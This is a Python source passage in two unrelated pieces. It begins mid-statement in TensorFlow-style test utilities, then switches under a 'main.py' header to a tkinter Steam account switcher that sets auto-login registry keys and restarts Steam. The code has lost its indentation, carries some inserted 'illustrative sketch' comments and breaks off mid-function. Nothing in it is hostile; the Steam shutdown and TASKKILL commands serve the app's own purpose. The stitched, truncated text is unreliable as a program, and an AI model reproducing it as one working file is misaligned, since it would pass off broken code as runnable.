"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
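  # Illustrative sketch (assumption):
  #
  #   labels = np.array([[0, 1], [1, 2]])
  #   self.assertAllInSet(labels, {0, 1, 2})  # passes
  #   self.assertAllInSet(labels, (0, 1))     # fails: 2 is not in the set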
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
    # Wrap single values so that both a list of arrays and a single array work.
    arrays = target if isinstance(target, list) else [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
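  # Illustrative usage sketch (assumption): both a regex and a predicate work;
  # `failing_op` below is a hypothetical op expected to fail at run time.
  #
  #   with self.assertRaisesOpError("dimensions must match"):
  #     self.evaluate(failing_op)
  #   with self.assertRaisesWithPredicateMatch(ValueError, lambda e: "bad" in str(e)):
  #     raise ValueError("bad input")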
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
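# Illustrative sketch (assumption; `constant_op` is a hypothetical import here):
#
#   g = ops.Graph()
#   with g.as_default():
#     constant_op.constant(1.0, name="my_const")
#   node = get_node_def_from_graph("my_const", g.as_graph_def())
#   assert node is not None and node.op == "Const"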
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
def dismantle_func_graph(func_graph):
"""Removes reference cycles in `func_graph` FuncGraph.
Helpful for making sure the garbage collector doesn't need to run when
the FuncGraph goes out of scope, e.g. in tests using defun with
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).
Args:
func_graph: A `FuncGraph` object to destroy. `func_graph` is unusable
after this function.
"""
# TODO(b/115366440): Delete this method when a custom OrderedDict is added.
# Clearing captures using clear() leaves some cycles around.
while func_graph.captures:
func_graph.captures.popitem()
memory.dismantle_ordered_dict(func_graph.captures)
ops.dismantle_graph(func_graph)
def dismantle_polymorphic_function(func):
"""Removes reference cycles in PolymorphicFunction `func`.
Helpful for making sure the garbage collector doesn't need to run when
PolymorphicFunction goes out of scope, e.g. in tests using defun with
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).
Args:
func: A `PolymorphicFunction` object to destroy. `func` is unusable
after this function.
"""
# TODO(b/115366440): Delete this method when a custom OrderedDict is added
cache = func._function_cache # pylint: disable=protected-access
for concrete_func in cache.values():
dismantle_func_graph(concrete_func.graph)
while cache:
cache.popitem()
memory.dismantle_ordered_dict(cache)
main.py
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.font as tkfont
from tkinter.scrolledtext import ScrolledText
from tkinter import messagebox as msgbox
import gettext
import winreg
import subprocess
import os
import sys
import queue as q
from time import sleep
from ruamel.yaml import YAML
from PIL import Image, ImageTk
from modules.account import acc_getlist, acc_getdict, loginusers
from modules.reg import fetch_reg, setkey
from modules.config import get_config, config_write_dict, config_write_value, SYS_LOCALE
from modules.util import steam_running, StoppableThread, open_screenshot, raise_exception, test, get_center_pos, launch_updater, create_shortcut
from modules.update import start_checkupdate, hide_update, show_update, update_frame_color
from modules.ui import DragDropListbox, AccountButton, AccountButtonGrid, SimpleButton, WelcomeWindow, steamid_window, ToolTipWindow, ask_steam_dir, get_color
from modules.avatar import download_avatar
yaml = YAML()
LOCALE = get_config('locale')
t = gettext.translation('steamswitcher',
localedir='locale',
languages=[LOCALE],
fallback=True)
_ = t.gettext
# For ImageTk, global variables must be used to prevent them from being GC'd.
image1 = None
image2 = None
image3 = None
image4 = None
def legacy_restart(silent=True):
    '''Legacy Steam restart routine used by the refresh feature.
    The newer threaded restarter doesn't seem to work reliably while refreshing.'''
try:
if steam_running():
if get_config('steam_path') == 'reg':
raw_path = fetch_reg('steampath')
else:
raw_path = get_config('steam_path').replace('\\', '/')
raw_path_items = raw_path.split('/')
path_items = []
for item in raw_path_items:
if ' ' in item:
path_items.append(f'"{item}"')
else:
path_items.append(item)
steam_exe = "\\".join(path_items) + '\\steam.exe'
print('Steam.exe path:', steam_exe)
subprocess.run(f"start {steam_exe} -shutdown", shell=True,
creationflags=0x08000000, check=True)
print('Shutdown command sent. Waiting for Steam...')
sleep(2)
counter = 0
while steam_running():
print('Steam is still running after %s seconds' % str(2 + counter))
if counter <= 10:
counter += 1
sleep(1)
continue
else:
msg = msgbox.askyesno(_('Alert'),
_('After soft shutdown attempt,') + '\n' +
_('Steam appears to be still running.') + '\n\n' +
_('Click yes to wait more for 10 seconds or no to force-exit Steam.'))
if msg:
counter = 0
continue
else:
raise FileNotFoundError
else:
print('Steam is not running.')
except (FileNotFoundError, subprocess.CalledProcessError):
print('Hard shutdown mode')
subprocess.run("TASKKILL /F /IM Steam.exe",
creationflags=0x08000000, check=True)
print('TASKKILL command sent.')
sleep(1)
if silent:
print('Launching Steam silently...')
subprocess.run("start steam://open",
shell=True, check=True)
else:
print('Launching Steam...')
subprocess.run("start steam://open/main",
shell=True, check=True)
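# Illustrative sketch (assumption): for a Steam install under a path with
# spaces, the quoting in legacy_restart() produces something like
#   C:\"Program Files (x86)"\Steam\steam.exe
# so that `start <path> -shutdown` resolves correctly in cmd.exe.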
class MainApp(tk.Tk):
'''Main application'''
def __init__(self, version, url, bundle, std_out, std_err, after_update):
sys.stdout = std_out
sys.stderr = std_err
self.accounts = acc_getlist()
self.acc_dict = acc_getdict()
self.demo_mode = False
self.BUNDLE = bundle
self.after_update = after_update
tk.Tk.__init__(self)
self['bg'] = get_color('window_background')
self.title(_("Account Switcher"))
self.window_width = 310
self.window_height = 465
center_x, center_y = get_center_pos(self, self.window_width, self.window_height)
if get_config('last_pos') != '0/0':
pos_x, pos_y = get_config('last_pos').split('/')
else:
pos_x, pos_y = center_x, center_y
self.geometry(f'{str(self.window_width)}x{str(self.window_height)}+{str(pos_x)}+{str(pos_y)}')
self.resizable(False, False)
self.protocol('WM_DELETE_WINDOW', self.exit_app)
try:
self.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
if not test():
ask_steam_dir()
menubar = tk.Menu(self)
if SYS_LOCALE == 'ko_KR':
menu_font = tkfont.Font(self, size=9, family='맑은 고딕')
menu = tk.Menu(menubar, tearoff=0, font=menu_font)
else:
menu = tk.Menu(menubar, tearoff=0)
menu.add_command(label=_('Import accounts from Steam'),
command=self.importwindow)
menu.add_command(label=_("Add accounts"),
command=self.addwindow)
menu.add_command(label=_("Edit account list"),
command=self.orderwindow)
menu.add_command(label=_("Refresh autologin"),
command=self.refreshwindow)
menu.add_command(label=_("Update all avatars"),
command=self.update_avatar)
menu.add_separator()
menu.add_command(label=_("Settings"),
command=self.settingswindow)
menu.add_command(label=_("Send feedback"),
command=lambda: os.startfile('https://github.com/sw2719/steam-account-switcher/issues'))
menu.add_command(label=_("About"),
command=lambda: self.about(version))
menubar.add_cascade(label=_("Menu"), menu=menu)
self.config(menu=menubar)
if not self.BUNDLE:
debug_menu = tk.Menu(menubar, tearoff=0)
debug_menu.add_command(label='Check for updates with debug mode',
command=lambda: self.after(10, lambda: start_checkupdate(self, version, url, self.BUNDLE, debug=True)))
debug_menu.add_command(label='Check for updates without debug mode',
command=lambda: self.after(10, lambda: start_checkupdate(self, version, url, True)))
debug_menu.add_command(label='Check for updates (Force update available)',
command=lambda: self.after(10, lambda: start_checkupdate(self, '1.0', url, True)))
debug_menu.add_command(label='Check for updates (Raise error)',
command=lambda: self.after(10, lambda: start_checkupdate(self, version, url, True, exception=True)))
debug_menu.add_command(label="Download avatar images",
command=download_avatar)
debug_menu.add_command(label="Open initial setup",
command=lambda: self.welcomewindow(debug=True))
debug_menu.add_command(label="Open initial setup with after_update True",
command=lambda: self.welcomewindow(debug=True, update_override=True))
debug_menu.add_command(label="Toggle demo mode",
command=self.toggle_demo)
debug_menu.add_command(label="Raise exception",
command=raise_exception)
debug_menu.add_command(label="Open about window with copyright notice",
command=lambda: self.about(version, force_copyright=True))
debug_menu.add_command(label="Launch updater (update.zip required)",
command=launch_updater)
debug_menu.add_command(label="Create shortcut",
command=create_shortcut)
debug_menu.add_command(label="Exit app with sys.exit",
command=sys.exit)
menubar.add_cascade(label=_("Debug"), menu=debug_menu)
self.bottomframe = tk.Frame(self, bg=get_color('bottomframe'))
self.bottomframe.pack(side='bottom', fill='x')
def toggleAutologin():
'''Toggle autologin registry value between 0 and 1'''
if fetch_reg('RememberPassword') == 1:
setkey('RememberPassword', 0, winreg.REG_DWORD)
elif fetch_reg('RememberPassword') == 0:
setkey('RememberPassword', 1, winreg.REG_DWORD)
if fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
self.autolabel['fg'] = get_color('autologin_text_on')
else:
self.auto_var.set(_('Auto-login Disabled'))
self.autolabel['fg'] = get_color('autologin_text_off')
self.restartbutton_text = tk.StringVar()
if get_config('autoexit') == 'true':
self.restartbutton_text.set(_('Restart Steam & Exit'))
else:
self.restartbutton_text.set(_('Restart Steam'))
self.button_toggle = SimpleButton(self.bottomframe,
widget='bottom_button',
text=_('Toggle auto-login'),
command=toggleAutologin,
bd=2)
self.button_exit = SimpleButton(self.bottomframe,
widget='bottom_button',
text=_('Exit'),
command=self.exit_app,
bd=2)
self.button_restart = SimpleButton(self.bottomframe,
widget='bottom_button',
textvariable=self.restartbutton_text,
command=self.exit_after_restart,
bd=2)
self.button_toggle.grid(row=0, column=0, padx=3, pady=3, sticky='nesw')
self.button_exit.grid(row=0, column=1, pady=3, sticky='nesw')
self.button_restart.grid(row=0, column=2, padx=3, pady=3, sticky='nesw')
self.bottomframe.grid_columnconfigure(0, weight=1)
self.bottomframe.grid_columnconfigure(1, weight=1)
self.bottomframe.grid_columnconfigure(2, weight=1)
self.bottomframe.grid_rowconfigure(0, weight=1)
self.button_dict = {}
self.upper_frame = tk.Frame(self, bg=get_color('upperframe'))
self.upper_frame.pack(side='top', fill='x')
self.button_frame = tk.Frame(self, bg=get_color('upperframe'))
self.button_frame.pack(side='top', fill='both', expand=True)
self.userlabel_1 = tk.Label(self.upper_frame, text=_('Current Auto-login user:'), bg=self.upper_frame['bg'], fg=get_color('text'))
self.userlabel_1.pack(side='top')
self.user_var = tk.StringVar()
self.user_var.set(fetch_reg('AutoLoginUser'))
self.userlabel_2 = tk.Label(self.upper_frame, textvariable=self.user_var, bg=self.upper_frame['bg'], fg=get_color('text'))
self.userlabel_2.pack(side='top', pady=2)
self.auto_var = tk.StringVar()
if fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
auto_color = get_color('autologin_text_on')
else:
self.auto_var.set(_('Auto-login Disabled'))
auto_color = get_color('autologin_text_off')
self.autolabel = tk.Label(self.upper_frame, textvariable=self.auto_var, bg=self.upper_frame['bg'], fg=auto_color)
self.autolabel.pack(side='top')
tk.Frame(self.upper_frame, bg='grey').pack(fill='x')
self.draw_button()
def get_window_pos(self):
geo = self.geometry().split('+')
return geo[1], geo[2]
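    # Illustrative sketch (assumption): with self.geometry() == '310x465+100+200',
    # get_window_pos() returns the position as strings, i.e. ('100', '200').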
def popup_geometry(self, width, height, multiplier=1):
width_delta = (self.window_width - width) // 2
main_x, main_y = self.get_window_pos()
x = int(main_x) + width_delta
y = int(main_y) + (25 * multiplier)
return f'{str(width)}x{str(height)}+{str(x)}+{str(y)}'
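    # Illustrative sketch (assumption): with the main window at +100+200 and
    # window_width == 310, popup_geometry(250, 165) yields '250x165+130+225'
    # (horizontally centered, offset 25 px downward per `multiplier`).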
def exit_app(self):
x, y = self.get_window_pos()
last_pos = f'{x}/{y}'
config_write_value('last_pos', last_pos)
sys.exit(0)
def toggle_demo(self):
if self.demo_mode:
self.demo_mode = False
else:
self.demo_mode = True
self.refresh()
def welcomewindow(self, debug=False, update_override=False):
if update_override:
window = WelcomeWindow(self, self.popup_geometry(320, 270, multiplier=2), True, debug)
else:
window = WelcomeWindow(self, self.popup_geometry(320, 270, multiplier=2), self.after_update, debug)
def event_function(event):
if str(event.widget) == '.!welcomewindow':
if self.accounts:
self.update_avatar()
self.refresh()
window.bind('<Destroy>', event_function)
def configwindow(self, username):
configwindow = tk.Toplevel(self, bg='white')
configwindow.title('')
x, y = self.get_window_pos()
configwindow.geometry(self.popup_geometry(250, 165))
configwindow.resizable(False, False)
configwindow.bind('<Escape>', lambda event: configwindow.destroy())
try:
configwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
i = self.accounts.index(username)
try:
custom_name = self.acc_dict[i]['customname']
except KeyError:
custom_name = ''
button_frame = tk.Frame(configwindow, bg='white')
button_frame.pack(side='bottom', pady=3)
ok_button = ttk.Button(button_frame, text=_('OK'))
ok_button.pack(side='right', padx=1.5)
cancel_button = ttk.Button(button_frame,
text=_('Cancel'),
command=configwindow.destroy)
cancel_button.pack(side='left', padx=1.5)
top_label = tk.Label(configwindow, text=_('Select name settings\nfor %s') % username, bg='white')
top_label.pack(side='top', pady=(4, 3))
radio_frame1 = tk.Frame(configwindow, bg='white')
radio_frame1.pack(side='top', padx=20, pady=(4, 2), fill='x')
radio_frame2 = tk.Frame(configwindow, bg='white')
radio_frame2.pack(side='top', padx=20, pady=(0, 3), fill='x')
radio_var = tk.IntVar()
if custom_name.strip():
radio_var.set(1)
else:
radio_var.set(0)
s = ttk.Style()
s.configure('config.TRadiobutton', background='white')
radio_default = ttk.Radiobutton(radio_frame1,
text=_('Use profile name if available'),
variable=radio_var,
value=0,
style='config.TRadiobutton')
radio_custom = ttk.Radiobutton(radio_frame2,
text=_('Use custom name'),
variable=radio_var,
value=1,
style='config.TRadiobutton')
radio_default.pack(side='left', pady=2)
radio_custom.pack(side='left', pady=2)
entry_frame = tk.Frame(configwindow, bg='white')
entry_frame.pack(side='bottom', pady=(1, 4))
name_entry = tk.Entry(entry_frame, width=27, disabledbackground='#C6C6C6', relief='solid')
name_entry.insert(0, custom_name)
name_entry.pack()
configwindow.grab_set()
configwindow.focus()
if radio_var.get() == 0:
name_entry['state'] = 'disabled'
name_entry.focus()
def reset_entry():
name_entry.delete(0, 'end')
name_entry['state'] = 'disabled'
def enable_entry():
name_entry['state'] = 'normal'
name_entry.focus()
radio_default['command'] = reset_entry
radio_custom['command'] = enable_entry
def ok(username):
if name_entry.get().strip() and radio_var.get() == 1:
input_name = name_entry.get()
self.acc_dict[i]['customname'] = input_name
print(f"Using custom name '{input_name}' for '{username}'.")
elif radio_var.get() == 1:
msgbox.showwarning(_('Info'), _('Enter a custom name to use.'), parent=configwindow)
return
else:
if self.acc_dict[i].pop('customname', None):
print(f"Custom name for '{username}' has been removed.")
with open('accounts.yml', 'w', encoding='utf-8') as f:
yaml.dump(self.acc_dict, f)
self.refresh()
configwindow.destroy()
def enterkey(event):
ok(username)
configwindow.bind('<Return>', enterkey)
ok_button['command'] = lambda username=username: ok(username)
configwindow.wait_window()
def button_func(self, username):
current_user = fetch_reg('AutoLoginUser')
try:
self.button_dict[current_user].enable()
except Exception:
pass
setkey('AutoLoginUser', username, winreg.REG_SZ)
self.button_dict[username].disable()
self.user_var.set(fetch_reg('AutoLoginUser'))
self.focus()
if get_config('mode') == 'express':
self.exit_after_restart()
def remove_user(self, target):
        '''Write accounts to accounts.yml, excluding the
        one the user wants to delete.'''
        if msgbox.askyesno(_('Confirm'), _('Are you sure you want to remove account %s?') % target):
acc_dict = acc_getdict()
accounts = acc_getlist()
dump_dict = {}
print(f'Removing {target}...')
for username in accounts:
if username != target:
dump_dict[len(dump_dict)] = acc_dict[accounts.index(username)]
with open('accounts.yml', 'w') as acc:
yaml.dump(dump_dict, acc)
self.refresh()
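    # Illustrative sketch (assumption): accounts.yml maps consecutive integer
    # keys to account entries, so removing 'bob' from
    #   {0: {'accountname': 'alice'}, 1: {'accountname': 'bob'}, 2: {'accountname': 'carol'}}
    # re-dumps it as
    #   {0: {'accountname': 'alice'}, 1: {'accountname': 'carol'}}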
def draw_button(self):
if get_config('ui_mode') == 'list':
self.draw_button_list()
elif get_config('ui_mode') == 'grid':
self.draw_button_grid()
def draw_button_grid(self):
menu_dict = {}
self.no_user_frame = tk.Frame(self.button_frame, bg=self['bg'])
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox("all"))
if self.demo_mode:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas, bg=self['bg'])
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for x in range(0, 13):
self.button_dict[x] = AccountButtonGrid(buttonframe,
username='username' + str(x),
profilename='profilename' + str(x),
image='default')
if x == 0:
self.button_dict[x].disable()
row = x // 3
column = x % 3
if column == 1:
self.button_dict[x].grid(row=row, column=column, padx=0, pady=(9, 0))
else:
self.button_dict[x].grid(row=row, column=column, padx=10, pady=(9, 0))
buttonframe.grid_propagate(0)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
            h = 109 * (13 // 3 + 1)  # 13 demo buttons -> 5 rows of buttons
canvas.create_window((0, 0), height=h + 9, width=295, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
elif self.accounts:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas, bg=self['bg'])
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for index, username in enumerate(self.accounts):
steam64_list, account_name, persona_name = loginusers()
if username in account_name:
i = account_name.index(username)
else:
i = None
try:
acc_index = self.accounts.index(username)
profilename = self.acc_dict[acc_index]['customname']
except KeyError: # No custom name set
if i is not None: # i could be 0 so we can't use if i:
profilename = persona_name[i]
else:
profilename = _('N/A')
finally:
if i is not None: # i could be 0 so we can't use if i:
steam64 = steam64_list[i]
image = steam64
else:
steam64 = None
image = 'default'
profilename = profilename[:30]
# We have to make a menu for every account! Sounds ridiculous? Me too.
if SYS_LOCALE == 'ko_KR':
menu_font = tkfont.Font(self, size=9, family='맑은 고딕')
menu_dict[username] = tk.Menu(self, tearoff=0, font=menu_font)
else:
menu_dict[username] = tk.Menu(self, tearoff=0)
menu_dict[username].add_command(label=_("Set as auto-login account"),
command=lambda name=username: self.button_func(name))
menu_dict[username].add_separator()
if i is not None: # i could be 0 so we can't use if i:
menu_dict[username].add_command(label=_('Open profile in browser'),
command=lambda steamid64=steam64: os.startfile(f'https://steamcommunity.com/profiles/{steamid64}'))
menu_dict[username].add_command(label=_('Open screenshots folder'),
command=lambda steamid64=steam64: open_screenshot(steamid64))
menu_dict[username].add_command(label=_('View SteamID'),
command=lambda username=username, steamid64=steam64: steamid_window(self, username, steamid64, self.popup_geometry(270, 180)))
menu_dict[username].add_command(label=_('Update avatar'),
command=lambda steamid64=steam64: self.update_avatar(steamid_list=[steamid64]))
menu_dict[username].add_separator()
menu_dict[username].add_command(label=_("Name settings"),
command=lambda name=username, pname=profilename: self.configwindow(name))
menu_dict[username].add_command(label=_("Delete"),
command=lambda name=username: self.remove_user(name))
def popup(username, event):
menu_dict[username].tk_popup(event.x_root + 86, event.y_root + 13, 0)
self.button_dict[username] = AccountButtonGrid(buttonframe,
username=username,
profilename=profilename,
command=lambda name=username: self.button_func(name),
rightcommand=lambda event, username=username: popup(username, event),
image=image)
if username == fetch_reg('AutoLoginUser'):
self.button_dict[username].disable(no_fade=True)
row = index // 3
column = index % 3
if column == 1:
self.button_dict[username].grid(row=row, column=column, padx=0, pady=(9, 0))
else:
self.button_dict[username].grid(row=row, column=column, padx=10, pady=(9, 0))
buttonframe.grid_propagate(0)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
if len(self.accounts) % 3 == 0:
h = 109 * (len(self.accounts) // 3)
else:
h = 109 * (len(self.accounts) // 3 + 1)
canvas.create_window((0, 0), height=h + 9, width=295, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
else:
self.no_user_frame.pack(side='top', fill='both', expand=True)
no_user = tk.Label(self.no_user_frame, text=_('No accounts added'), bg=self['bg'])
self.unbind("<MouseWheel>")
no_user.pack(pady=(150, 0))
def draw_button_list(self):
menu_dict = {}
self.no_user_frame = tk.Frame(self.button_frame, bg=self['bg'])
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox("all"))
if self.demo_mode:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas)
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for x in range(0, 8):
self.button_dict[x] = AccountButton(buttonframe,
username='username' + str(x),
profilename='profilename' + str(x),
image='default')
if x == 0:
self.button_dict[x].disable()
self.button_dict[x].pack(fill='x')
tk.Frame(buttonframe, bg='#c4c4c4').pack(fill='x')
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
h = 49 * 8
